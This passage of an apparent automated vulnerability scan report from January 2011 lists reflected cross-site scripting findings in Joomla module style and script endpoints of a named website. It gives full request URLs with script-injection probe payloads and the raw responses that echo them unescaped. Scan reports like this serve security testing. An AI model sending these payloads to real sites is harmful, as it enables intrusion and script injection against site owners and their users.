Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001B7A)%3C/script%3E&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: '"--></style></script><script>netsparker(0x001B7A)</script>;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_news_show_gk3/style/style.php

/modules/mod_news_show_gk3/style/style.php

http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_new_boats&news_c..

Parameters

Parameter Type Value
modid GET home_new_boats
news_content_header_pos GET 1
news_content_image_pos GET 1
img_height GET 0
img_width GET 195px '"--></style></script><script>alert(0x001B99)</script>
news_content_info_pos GET 1
news_content_readmore_pos GET 1
news_content_text_pos GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=home_new_boats&news_content_header_pos=1&news_content_image_pos=1&img_height=0&img_width=195px%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001B99)%3C%2Fscript%3E&news_content_info_pos=1&news_content_readmore_pos=1&news_content_text_pos=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



#home_new_boats a.readon_class{
float: left;}

#home_new_boats h4.gk_news_show_news_header {
margin: 0 0 8px;
padding:0;
text-align: left;}

#home_new_boats img.gk_news_show_news_image {
display: block;float: left;}

#home_new_boats img.gk_news_show_news_image_static {
display: block;float: left;width: 195px '"--></style></script><script>netsparker(0x001B99)</script>;}

#home_new_boats a.gk_news_show_news_readmore {
}

#home_new_boats a.gk_news_show_news_readmore_inline {
margin-left: 10px;
}

#home_new_boats p.gk_news_show_news_text {
margin-top: 0px;
text-align: left;}

#home_new_boats p.gk_news_show_news_info{
text-align: left}

#home_new_boats table.gk_news_show_table {
}

#home_new_boats td.gk_news_show_tablerow_top {
}

#home_new_boats div.gk_news_show_panel {
display: none;
padding: 6px 0 0 0;
}

#home_new_boats div.gk_news_show_panel_font {
float: left;
width: 100px;
padding: 0;
}

#home_new_boats div.gk_news_show_panel_font_path {
width: 100px;
height: 6px;
padding: 0;
border: 1px solid #EEE;
}

#home_new_boats div.gk_news_show_panel_font_knob {
width: 5px;
height: 6px;
padding: 0;
cursor: pointer;
font-size: 1px;
background: #CCC;
}

#home_new_boats span.gk_news_show_panel_font_value {
display:block;
float:left;
}

#home_new_boats div.gk_news_show_panel_amount {
float: right;
width: 50px;
padding: 0;
}

#home_new_boats div.gk_news_show_panel_amount_plus,
#home_new_boats div.gk_news_show_panel_amount_minus {
width: 12px;
height: 12px;
float:left;
line-height: 12px;
padding: 0;
text-align: center;
cursor: pointer;
margin-right: 3px;
border: 1px solid #EEE;
}

#home_new_boats span.gk_news_show_panel_amount_value {
display: block;
float:left;
font-size: 10px;
margin-left: 4px;
}

#home_new_boats div.gk_news_show_panel_tools,
#home_new_boats div.gk_news_show_panel_tools_hidden {
cursor: pointer;
padding: 0;
float:right;
font-size: 10px;

}

#home_new_boats td.gk_news_show_panel-border {
border-top: 1px dotted #ccc;
}

#home_new_boats tr.gk_news_show_tablerow {
}

#home_new_boats td.gk_news_show_left {
}

#home_new_boats td.gk_news_show_center {
}

#home_new_boats td.gk_news_show_right {
}

#home_new_boats td.gk_news_show_tablerow_bottom ul.gk_news_show_list_floated {
}

#home_new_boats ul.gk_news_show_list {
}

#home_new_boats tr.gk_news_show_tablerow{
}

#home_new_boats tr.gk_news_show_tablerow_invisible{
display: none;
}

#home_new_boats li.block{
display: block;
}

#home_new_boats li.none{
display: none;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid='%22--%3E%3C/style%3E..

Parameters

Parameter Type Value
mid GET '"--></style></script><script>alert(0x001BAA)</script>
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001BAA)%3C/script%3E&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-'"--></style></script><script>netsparker(0x001BAA)</script>"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET '"--></style></script><script>alert(0x001BD4)</script>
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001BD4)%3C/script%3E&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: '"--></style></script><script>netsparker(0x001BD4)</script>px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: '"--></style></script><script>netsparker(0x001BD4)</script>px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: '"--></style></script><script>netsparker(0x001BD4)</script>px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET '"--></style></script><script>alert(0x001BF6)</script>
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001BF6)%3C/script%3E&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":'"--></style></script><script>netsparker(0x001BF6)</script>,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET '"--></style></script><script>alert(0x001C19)</script>
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001C19)%3C/script%3E&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: '"--></style></script><script>netsparker(0x001C19)</script>px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: '"--></style></script><script>netsparker(0x001C19)</script>px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET '"--></style></script><script>alert(0x001C1D)</script>
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001C1D)%3C/script%3E&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":'"--></style></script><script>netsparker(0x001C1D)</script>,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET '"--></style></script><script>alert(0x001C45)</script>
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001C45)%3C/script%3E&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":'"--></style></script><script>netsparker(0x001C45)</script>,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET '"--></style></script><script>alert(0x001C4F)</script>
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001C4F)%3C/script%3E&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
